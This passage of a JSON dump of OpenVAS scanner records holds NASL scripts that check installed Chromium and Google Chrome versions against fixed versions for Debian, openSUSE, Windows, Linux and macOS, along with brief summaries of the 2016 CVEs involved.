script_tag(name:\"affected\", value:\"chromium-browser on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (jessie),\nthese problems have been fixed in version 55.0.2883.75-1~deb8u1.\n\nFor the testing distribution (stretch), these problems will be fixed soon.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 55.0.2883.75-1.\n\nWe recommend that you upgrade your chromium-browser packages.\");\n script_tag(name:\"summary\", value:\"Several vulnerabilities have been\ndiscovered in the chromium web browser.\n\nCVE-2016-5181\nA cross-site scripting issue was discovered.\n\nCVE-2016-5182\nGiwan Go discovered a heap overflow issue.\n\nCVE-2016-5183\nA use-after-free issue was discovered in the pdfium library.\n\nCVE-2016-5184\nAnother use-after-free issue was discovered in the pdfium library.\n\nCVE-2016-5185\ncloudfuzzer discovered a use-after-free issue in Blink/Webkit.\n\nCVE-2016-5186\nAbdulrahman Alqabandi discovered an out-of-bounds read issue in the\ndeveloper tools.\n\nCVE-2016-5187\nLuan Herrera discovered a URL spoofing issue.\n\nDescription truncated. Please see the references for more information.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed\nsoftware version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"chromedriver\", ver:\"55.0.2883.75-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"chromium\", ver:\"55.0.2883.75-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"chromium-dbg\", ver:\"55.0.2883.75-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"chromium-inspector\", ver:\"55.0.2883.75-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"chromium-l10n\", ver:\"55.0.2883.75-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-24T12:54:13", "description": "Several vulnerabilities have been\ndiscovered in the chromium web browser.\n\nCVE-2016-5181 \nA cross-site scripting issue was discovered.\n\nCVE-2016-5182 \nGiwan Go discovered a heap overflow issue.\n\nCVE-2016-5183 \nA use-after-free issue was discovered in the pdfium library.\n\nCVE-2016-5184 \nAnother use-after-free issue was discovered in the pdfium library.\n\nCVE-2016-5185 \ncloudfuzzer discovered a use-after-free issue in Blink/Webkit.\n\nCVE-2016-5186 \nAbdulrahman Alqabandi discovered an out-of-bounds read issue in the\ndeveloper tools.\n\nCVE-2016-5187 \nLuan Herrera discovered a URL spoofing issue.\n\nCVE-2016-5188 \nLuan Herrera discovered that some drop down menus can be used to\nhide parts of the user interface.\n\nCVE-2016-5189 \nxisigr discovered a URL spoofing issue.\n\nCVE-2016-5190 \nAtte Kettunen discovered a use-after-free issue.\n\nCVE-2016-5191 \nGareth Hughes discovered a cross-site scripting issue.\n\nCVE-2016-5192 \nhaojunhou@gmail.com discovered a same-origin bypass.\n\nCVE-2016-5193 \nYuyang Zhou discovered a way to pop open a new window.\n\nCVE-2016-5194 \nThe chrome development team found and fixed various issues during\ninternal auditing.\n\nCVE-2016-5198 \nTencent Keen Security Lab discovered an out-of-bounds memory access\nissue in the v8 javascript library.\n\nCVE-2016-5199 \nA heap corruption issue was discovered in the ffmpeg library.\n\nCVE-2016-5200 \nChoongwoo Han discovered an out-of-bounds memory access issue in\nthe v8 javascript library.\n\nCVE-2016-5201 \nRob Wu discovered an information leak.\n\nCVE-2016-5202 \nThe chrome development team found and fixed various issues during\ninternal auditing.\n\nCVE-2016-5203 \nA use-after-free issue was discovered in the pdfium library.\n\nCVE-2016-5204 \nMariusz Mlynski discovered a cross-site scripting issue in SVG\nimage handling.\n\nCVE-2016-5205 \nA cross-site scripting issue was discovered.\n\nCVE-2016-5206 \nRob Wu discovered a same-origin bypass in the pdfium library.\n\nCVE-2016-5207 \nMariusz Mlynski discovered a cross-site scripting issue.\n\nCVE-2016-5208 \nMariusz Mlynski discovered another cross-site scripting issue.\n\nCVE-2016-5209 \nGiwan Go discovered an out-of-bounds write issue in Blink/Webkit.\n\nCVE-2016-5210 \nKe Liu discovered an out-of-bounds write in the pdfium library.\n\nCVE-2016-5211 \nA use-after-free issue was discovered in the pdfium library.\n\nCVE-2016-5212 \nKhalil Zhani discovered an information disclosure issue in the\ndeveloper tools.\n\nCVE-2016-5213 \nKhalil Zhani discovered a use-after-free issue in the v8 javascript\nlibrary.\n\nCVE-2016-5214 \nJonathan Birch discovered a file download protection bypass.\n\nCVE-2016-5215 \nLooben Yang discovered a use-after-free issue.\n\nCVE-2016-5216 \nA use-after-free issue was discovered in the pdfium library.\n\nCVE-2016-5217 \nRob Wu discovered a condition where data was not validated by\nthe pdfium library.\n\nCVE-2016-5218 \nAbdulrahman Alqabandi discovered a URL spoofing issue.\n\nCVE-2016-5219 \nRob Wu discovered a use-after-free issue in the v8 javascript\nlibrary.\n\nCVE-2016-5220 \nRob Wu discovered a way to access files on the local system.\n\nCVE-2016-5221 \nTim Becker discovered an integer overflow issue in the angle\nlibrary.\n\nCVE-2016-5222 \nxisigr discovered a URL spoofing issue.\n\nCVE-2016-5223 \nHwiwon Lee discovered an integer overflow issue in the pdfium\nlibrary.\n\nCVE-2016-5224 \nRoeland Krak discovered a same-origin bypass in SVG image handling.\n\nCVE-2016-5225 \nScott Helme discovered a Content Security Protection bypass.\n\nCVE-2016-5226 \nJun Kokatsu discovered a cross-scripting issue.\n\nCVE-2016-9650 \nJakub ?oczek discovered a Content Security Protection information\ndisclosure.\n\nCVE-2016-9651 \nGuang Gong discovered a way to access private data in the v8\njavascript library.\n\nCVE-2016-9652 \nThe chrome development team found and fixed various issues during\ninternal auditing.", "cvss3": {}, "published": "2016-12-11T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3731-1 (chromium-browser - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5224", "CVE-2016-5225", "CVE-2016-5183", "CVE-2016-5182", "CVE-2016-5208", "CVE-2016-5191", "CVE-2016-5186", "CVE-2016-5217", "CVE-2016-9651", "CVE-2016-5184", "CVE-2016-5211", "CVE-2016-9652", "CVE-2016-9650", "CVE-2016-5202", "CVE-2016-5222", "CVE-2016-5209", "CVE-2016-5189", "CVE-2016-5205", "CVE-2016-5221", "CVE-2016-5220", "CVE-2016-5198", "CVE-2016-5194", "CVE-2016-5219", "CVE-2016-5216", "CVE-2016-5207", "CVE-2016-5215", "CVE-2016-5185", "CVE-2016-5193", "CVE-2016-5218", "CVE-2016-5190", "CVE-2016-5181", "CVE-2016-5203", "CVE-2016-5213", "CVE-2016-5212", "CVE-2016-5214", "CVE-2016-5223", "CVE-2016-5206", "CVE-2016-5210", "CVE-2016-5200", "CVE-2016-5199", "CVE-2016-5188", "CVE-2016-5192", "CVE-2016-5201", "CVE-2016-5204", "CVE-2016-5187", "CVE-2016-5226"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:703731", "href": "http://plugins.openvas.org/nasl.php?oid=703731", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3731.nasl 6608 2017-07-07 12:05:05Z cfischer $\n# Auto-generated from advisory DSA 3731-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703731);\n script_version(\"$Revision: 6608 $\");\n script_cve_id(\"CVE-2016-5181\", \"CVE-2016-5182\", \"CVE-2016-5183\", \"CVE-2016-5184\",\n \"CVE-2016-5185\", \"CVE-2016-5186\", \"CVE-2016-5187\", \"CVE-2016-5188\",\n \"CVE-2016-5189\", \"CVE-2016-5190\", \"CVE-2016-5191\", \"CVE-2016-5192\",\n \"CVE-2016-5193\", \"CVE-2016-5194\", \"CVE-2016-5198\", \"CVE-2016-5199\",\n \"CVE-2016-5200\", \"CVE-2016-5201\", \"CVE-2016-5202\", \"CVE-2016-5203\",\n \"CVE-2016-5204\", \"CVE-2016-5205\", \"CVE-2016-5206\", \"CVE-2016-5207\",\n \"CVE-2016-5208\", \"CVE-2016-5209\", \"CVE-2016-5210\", \"CVE-2016-5211\",\n \"CVE-2016-5212\", \"CVE-2016-5213\", \"CVE-2016-5214\", \"CVE-2016-5215\",\n \"CVE-2016-5216\", \"CVE-2016-5217\", \"CVE-2016-5218\", \"CVE-2016-5219\",\n \"CVE-2016-5220\", \"CVE-2016-5221\", \"CVE-2016-5222\", \"CVE-2016-5223\",\n \"CVE-2016-5224\", \"CVE-2016-5225\", \"CVE-2016-5226\", \"CVE-2016-9650\",\n \"CVE-2016-9651\", \"CVE-2016-9652\");\n script_name(\"Debian Security Advisory DSA 3731-1 (chromium-browser - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:05 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2016-12-11 00:00:00 +0100 (Sun, 11 Dec 2016)\");\n script_tag(name: \"cvss_base\", value: \"10.0\");\n script_tag(name: \"cvss_base_vector\", value: \"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2016/dsa-3731.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"chromium-browser on Debian Linux\");\n script_tag(name: \"solution\", value: \"For the stable distribution (jessie),\nthese problems have been fixed in version 55.0.2883.75-1~deb8u1.\n\nFor the testing distribution (stretch), these problems will be fixed soon.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 55.0.2883.75-1.\n\nWe recommend that you upgrade your chromium-browser packages.\");\n script_tag(name: \"summary\", value: \"Several vulnerabilities have been\ndiscovered in the chromium web browser.\n\nCVE-2016-5181 \nA cross-site scripting issue was discovered.\n\nCVE-2016-5182 \nGiwan Go discovered a heap overflow issue.\n\nCVE-2016-5183 \nA use-after-free issue was discovered in the pdfium library.\n\nCVE-2016-5184 \nAnother use-after-free issue was discovered in the pdfium library.\n\nCVE-2016-5185 \ncloudfuzzer discovered a use-after-free issue in Blink/Webkit.\n\nCVE-2016-5186 \nAbdulrahman Alqabandi discovered an out-of-bounds read issue in the\ndeveloper tools.\n\nCVE-2016-5187 \nLuan Herrera discovered a URL spoofing issue.\n\nCVE-2016-5188 \nLuan Herrera discovered that some drop down menus can be used to\nhide parts of the user interface.\n\nCVE-2016-5189 \nxisigr discovered a URL spoofing issue.\n\nCVE-2016-5190 \nAtte Kettunen discovered a use-after-free issue.\n\nCVE-2016-5191 \nGareth Hughes discovered a cross-site scripting issue.\n\nCVE-2016-5192 \nhaojunhou@gmail.com discovered a same-origin bypass.\n\nCVE-2016-5193 \nYuyang Zhou discovered a way to pop open a new window.\n\nCVE-2016-5194 \nThe chrome development team found and fixed various issues during\ninternal auditing.\n\nCVE-2016-5198 \nTencent Keen Security Lab discovered an out-of-bounds memory access\nissue in the v8 javascript library.\n\nCVE-2016-5199 \nA heap corruption issue was discovered in the ffmpeg library.\n\nCVE-2016-5200 \nChoongwoo Han discovered an out-of-bounds memory access issue in\nthe v8 javascript library.\n\nCVE-2016-5201 \nRob Wu discovered an information leak.\n\nCVE-2016-5202 \nThe chrome development team found and fixed various issues during\ninternal auditing.\n\nCVE-2016-5203 \nA use-after-free issue was discovered in the pdfium library.\n\nCVE-2016-5204 \nMariusz Mlynski discovered a cross-site scripting issue in SVG\nimage handling.\n\nCVE-2016-5205 \nA cross-site scripting issue was discovered.\n\nCVE-2016-5206 \nRob Wu discovered a same-origin bypass in the pdfium library.\n\nCVE-2016-5207 \nMariusz Mlynski discovered a cross-site scripting issue.\n\nCVE-2016-5208 \nMariusz Mlynski discovered another cross-site scripting issue.\n\nCVE-2016-5209 \nGiwan Go discovered an out-of-bounds write issue in Blink/Webkit.\n\nCVE-2016-5210 \nKe Liu discovered an out-of-bounds write in the pdfium library.\n\nCVE-2016-5211 \nA use-after-free issue was discovered in the pdfium library.\n\nCVE-2016-5212 \nKhalil Zhani discovered an information disclosure issue in the\ndeveloper tools.\n\nCVE-2016-5213 \nKhalil Zhani discovered a use-after-free issue in the v8 javascript\nlibrary.\n\nCVE-2016-5214 \nJonathan Birch discovered a file download protection bypass.\n\nCVE-2016-5215 \nLooben Yang discovered a use-after-free issue.\n\nCVE-2016-5216 \nA use-after-free issue was discovered in the pdfium library.\n\nCVE-2016-5217 \nRob Wu discovered a condition where data was not validated by\nthe pdfium library.\n\nCVE-2016-5218 \nAbdulrahman Alqabandi discovered a URL spoofing issue.\n\nCVE-2016-5219 \nRob Wu discovered a use-after-free issue in the v8 javascript\nlibrary.\n\nCVE-2016-5220 \nRob Wu discovered a way to access files on the local system.\n\nCVE-2016-5221 \nTim Becker discovered an integer overflow issue in the angle\nlibrary.\n\nCVE-2016-5222 \nxisigr discovered a URL spoofing issue.\n\nCVE-2016-5223 \nHwiwon Lee discovered an integer overflow issue in the pdfium\nlibrary.\n\nCVE-2016-5224 \nRoeland Krak discovered a same-origin bypass in SVG image handling.\n\nCVE-2016-5225 \nScott Helme discovered a Content Security Protection bypass.\n\nCVE-2016-5226 \nJun Kokatsu discovered a cross-scripting issue.\n\nCVE-2016-9650 \nJakub ?oczek discovered a Content Security Protection information\ndisclosure.\n\nCVE-2016-9651 \nGuang Gong discovered a way to access private data in the v8\njavascript library.\n\nCVE-2016-9652 \nThe chrome development team found and fixed various issues during\ninternal auditing.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed\nsoftware version using the apt package manager.\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"chromedriver\", ver:\"55.0.2883.75-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"chromium\", ver:\"55.0.2883.75-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"chromium-dbg\", ver:\"55.0.2883.75-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"chromium-inspector\", ver:\"55.0.2883.75-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"chromium-l10n\", ver:\"55.0.2883.75-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-11-20T16:20:20", "description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2016-11-16T00:00:00", "type": "openvas", "title": "Google Chrome Security Updates(stable-channel-update-for-desktop_9-2016-11)-Windows", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5202", "CVE-2016-5200", "CVE-2016-5199", "CVE-2016-5201"], "modified": "2019-11-19T00:00:00", "id": "OPENVAS:1361412562310809095", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809095", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Google Chrome Security Updates(stable-channel-update-for-desktop_9-2016-11)-Windows\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809095\");\n script_version(\"2019-11-19T07:59:35+0000\");\n script_cve_id(\"CVE-2016-5199\", \"CVE-2016-5200\", \"CVE-2016-5201\", \"CVE-2016-5202\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-11-19 07:59:35 +0000 (Tue, 19 Nov 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-11-16 17:47:43 +0530 (Wed, 16 Nov 2016)\");\n script_name(\"Google Chrome Security Updates(stable-channel-update-for-desktop_9-2016-11)-Windows\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws exist due to\n\n - The heap corruption error in FFmpeg.\n\n - An out of bounds memory access error in V8.\n\n - An info leak error in extensions.\n\n - The various fixes from internal audits, fuzzing and other initiatives\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of these\n vulnerabilities will allow remote attackers to corrupt memory, to access\n sensitive information and to cause the application crash.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version\n prior to 54.0.2840.99 on Windows\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version\n 54.0.2840.99 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"https://googlechromereleases.blogspot.in/2016/11/stable-channel-update-for-desktop_9.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_portable_win.nasl\");\n script_mandatory_keys(\"GoogleChrome/Win/Ver\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!chr_ver = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:chr_ver, test_version:\"54.0.2840.99\"))\n{\n report = report_fixed_ver(installed_version:chr_ver, fixed_version:\"54.0.2840.99\");\n security_message(data:report);\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-20T16:19:24", "description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2016-11-16T00:00:00", "type": "openvas", "title": "Google Chrome Security Updates(stable-channel-update-for-desktop_9-2016-11)-Linux", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5202", "CVE-2016-5200", "CVE-2016-5199", "CVE-2016-5201"], "modified": "2019-11-19T00:00:00", "id": "OPENVAS:1361412562310809097", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809097", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Google Chrome Security Updates(stable-channel-update-for-desktop_9-2016-11)-Linux\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809097\");\n script_version(\"2019-11-19T07:59:35+0000\");\n script_cve_id(\"CVE-2016-5199\", \"CVE-2016-5200\", \"CVE-2016-5201\", \"CVE-2016-5202\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-11-19 07:59:35 +0000 (Tue, 19 Nov 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-11-16 17:47:43 +0530 (Wed, 16 Nov 2016)\");\n script_name(\"Google Chrome Security Updates(stable-channel-update-for-desktop_9-2016-11)-Linux\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws exist due to\n\n - The heap corruption error in FFmpeg.\n\n - An out of bounds memory access error in V8.\n\n - An info leak error in extensions.\n\n - The various fixes from internal audits, fuzzing and other initiatives\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of these\n vulnerabilities will allow remote attackers to corrupt memory, to access\n sensitive information and to cause the application crash.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version\n prior to 54.0.2840.100 on Linux\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version\n 54.0.2840.100 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://googlechromereleases.blogspot.in/2016/11/stable-channel-update-for-desktop_9.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_lin.nasl\");\n script_mandatory_keys(\"Google-Chrome/Linux/Ver\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!chr_ver = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:chr_ver, test_version:\"54.0.2840.100\"))\n{\n report = report_fixed_ver(installed_version:chr_ver, fixed_version:\"54.0.2840.100\");\n security_message(data:report);\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-20T16:19:32", "description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2016-11-16T00:00:00", "type": "openvas", "title": "Google Chrome Security Updates(stable-channel-update-for-desktop_9-2016-11)-MAC OS X", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5202", "CVE-2016-5200", "CVE-2016-5199", "CVE-2016-5201"], "modified": "2019-11-19T00:00:00", "id": "OPENVAS:1361412562310809098", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809098", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Google Chrome Security Updates(stable-channel-update-for-desktop_9-2016-11)-MAC OS X\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809098\");\n script_version(\"2019-11-19T07:59:35+0000\");\n script_cve_id(\"CVE-2016-5199\", \"CVE-2016-5200\", \"CVE-2016-5201\", \"CVE-2016-5202\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-11-19 07:59:35 +0000 (Tue, 19 Nov 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-11-16 17:47:43 +0530 (Wed, 16 Nov 2016)\");\n script_name(\"Google Chrome Security Updates(stable-channel-update-for-desktop_9-2016-11)-MAC OS X\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws exist due to\n\n - The heap corruption error in FFmpeg.\n\n - An out of bounds memory access error in V8.\n\n - An info leak error in extensions.\n\n - The various fixes from internal audits, fuzzing and other initiatives\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of these\n vulnerabilities will allow remote attackers to corrupt memory, to access\n sensitive information and to cause the application crash.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version\n prior to 54.0.2840.98 on MAC OS X\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version\n 54.0.2840.98 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://googlechromereleases.blogspot.in/2016/11/stable-channel-update-for-desktop_9.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_macosx.nasl\");\n script_mandatory_keys(\"GoogleChrome/MacOSX/Version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!chr_ver = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:chr_ver, test_version:\"54.0.2840.98\"))\n{\n report = report_fixed_ver(installed_version:chr_ver, fixed_version:\"54.0.2840.98\");\n security_message(data:report);\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-31T18:35:19", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-11-15T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for Chromium (openSUSE-SU-2016:2793-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5202", "CVE-2016-5200", "CVE-2016-5199", "CVE-2016-5201"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310851433", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851433", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851433\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-11-15 05:41:17 +0100 (Tue, 15 Nov 2016)\");\n script_cve_id(\"CVE-2016-5199\", \"CVE-2016-5200\", \"CVE-2016-5201\", \"CVE-2016-5202\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n 